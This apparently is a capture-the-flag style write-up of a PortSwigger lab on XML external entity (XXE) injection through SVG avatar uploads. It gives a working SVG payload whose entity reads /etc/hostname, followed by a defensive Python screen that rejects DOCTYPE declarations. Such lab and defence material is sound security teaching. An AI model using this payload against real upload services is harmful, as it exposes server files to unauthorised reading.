Lab: Exploiting XXE via image file upload

tags: Portswigger Web Security Academy Web
  • Description: This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
  • Goal: To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the “Submit solution” button to submit the value of the server hostname.

Recon

In this lab, we can upload an SVG avatar that contains malicious XML: a DOCTYPE declaring an external entity. Because the server parses the SVG with Apache Batik, the entity is expanded during processing and the contents of a local file are rendered into the image, which lets us read sensitive information from the server.

Exploit - Upload a Malicious SVG as Avatar

  1. Create the exploit file. Create a text file containing the payload below: an SVG whose DOCTYPE declares an external entity pointing at /etc/hostname and references it inside a <text> element, so the file contents are drawn into the image.
    <?xml version="1.0" standalone="yes"?>
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
    <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
      <text font-size="16" x="0" y="16">&xxe;</text>
    </svg>
    
  2. Rename the file to .svg and upload it. After giving the file a .svg extension, choose any post and leave a comment below it, attaching the file as your avatar.

  3. Check your avatar. Go back to the post page and verify that your avatar image now shows a string: the server hostname (the sensitive data), which you must submit with the "Submit solution" button.
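From the defender's side, the fix for this lab is to refuse any avatar that carries a DOCTYPE (and so any entity declaration) before it ever reaches an XML-based renderer such as Batik. The Python pre-screen below is an added example, not lab or PortSwigger code; the size limit, the function name and the two sample SVGs are assumptions.

```python
import xml.parsers.expat as expat

SVG_NS = "http://www.w3.org/2000/svg"
MAX_AVATAR_BYTES = 64 * 1024  # assumed upload limit for a 128px avatar

class UnsafeSvg(Exception):
    """Raised inside an expat callback to abort parsing at once."""

def screen_svg(data: bytes) -> list:
    """Return reasons to reject `data`; an empty list means accept."""
    if len(data) > MAX_AVATAR_BYTES:
        return ["file exceeds avatar size limit"]
    reasons, root = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # <!ENTITY ...> can only live inside a DOCTYPE: refuse it before
        # any entity is declared, let alone expanded.
        raise UnsafeSvg("DOCTYPE declaration (%s) not allowed in avatars" % name)

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeSvg("external entity reference to %s" % sysid)  # never resolve

    def on_start(name, attrs):
        if not root:
            root.append(name)  # remember only the document element

    # namespace_separator makes names "<uri> <local>", so the root check
    # keys on the real SVG namespace rather than on a prefix.
    parser = expat.ParserCreate(namespace_separator=" ")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except UnsafeSvg as exc:
        reasons.append(str(exc))
    except expat.ExpatError as exc:
        reasons.append("not well-formed XML: %s" % exc)
    if not reasons and root != [SVG_NS + " svg"]:
        reasons.append("root element is not an SVG <svg>")
    return reasons

# Constructed samples: the lab payload (entity reads /etc/hostname) and a benign avatar.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg xmlns="http://www.w3.org/2000/svg" width="128px" height="128px">
  <text font-size="16" x="0" y="16">&xxe;</text></svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="128px" height="128px">
  <circle cx="64" cy="64" r="60" fill="steelblue"/></svg>"""
```

The screen is only a first gate: the renderer itself should still be configured to disallow DOCTYPE declarations and external entity resolution.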